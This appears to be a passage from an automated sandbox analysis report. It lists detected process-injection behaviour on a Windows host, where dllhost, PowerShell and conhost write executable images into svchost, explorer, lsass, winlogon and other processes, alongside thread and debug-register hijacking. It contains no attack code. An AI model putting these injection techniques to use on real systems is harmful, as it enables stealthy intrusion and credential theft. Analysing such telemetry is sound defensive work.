Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: ED0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 780000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 280C22F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1FB970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 25EE91B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1AD31C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 226AD1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 138D43C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 236C6DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 15829E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1D643A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1CDEB370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 22F41AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 20631820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 19C5BA20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DE98F00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1CCE3640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1858EA10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 228C25A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2942EBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 23D96450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1C8A0380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 26D9F390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1E5EF030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 248D2920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 21C0EE50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43B8A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E43BA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 165EDA50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 201B5250000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140000000 value: 4D Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140001000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140367000 value: 1E Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 1404A0000 value: F0 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140753000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140775000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140776000 value: C5 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140777000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 140779000 value: 48 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 14077B000 value: 60 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 14077C000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 14077D000 value: 00 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: PID: 1528 base: 81E010 value: 00 Jump to behavior
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 3968 base: 29E0000 value: 4D
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 1528 base: CD0000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 1528 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 1528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 4672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 7560
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 5880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 7528
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 4912
Sets debug register (to hijack the execution of another thread)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 1528 1
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\paint.exe Memory written: C:\Windows\System32\conhost.exe base: 113DAF00000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 12BE3BE0000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe Memory written: C:\Windows\System32\conhost.exe base: 21E7B340000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140000000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140001000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140367000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 1404A0000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140753000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140775000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140776000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140777000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 140779000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077B000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077C000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 14077D000 Jump to behavior
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\explorer.exe base: 81E010 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory written: C:\Windows\System32\conhost.exe base: 236ACAA0000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 780000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 800000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 3B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 231A3A3010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: B712225010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: E7A5297010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 79686B5010
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC5FF90000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 1FC60380000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 161C7340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 233B91B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 210918F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2062E960000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 282B8D70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22856DC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 18F9CCD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 207BAC00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 16F9C9D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 27A01800000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2992B230000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23227590000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BC9BDC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 28098F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23ACD780000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BBD2B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F1C1330000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 192A4090000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F8F61C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5112C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2848B1D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A12F60000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D8115C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C8B4690000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BF9EBD0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 213C6680000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: B80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 25B905C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2905A8E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BADC5B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A5FA180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19296180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24ED0B70000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20955300000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 27D95820000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B054660000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15D00D80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20983090000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1FBDB1C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 278CACC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DF6DEC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13AD1CA0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DAE2270000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1FD1BED0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 284FF340000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 22687920000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17CCCCC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B661F20000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 281EEB30000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DD637D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 29E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2081CC80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1EFC6EF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23263180000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2064B670000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 2609B3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 22E30FF0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A0E5E00000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 1F535400000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 238916A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A2C40A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1BA8FD80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\SystemSettingsuserer.exe base: 157081D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 255E3AC0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 149A8F80000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 23115780000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 21C5D0E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\Runtimeuserer.exe base: 1B97E3B0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2A3693C0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 29204CE0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A0126F0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 251F17A0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1190000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\lcxTyjSztvyMokFJZujYaFvWEKEveWtUjOaDvIKNxtsKsNYzCXcturSe\DCdwNeAJlmjStsuFaRKUTtYLXyd.exe base: 1170000
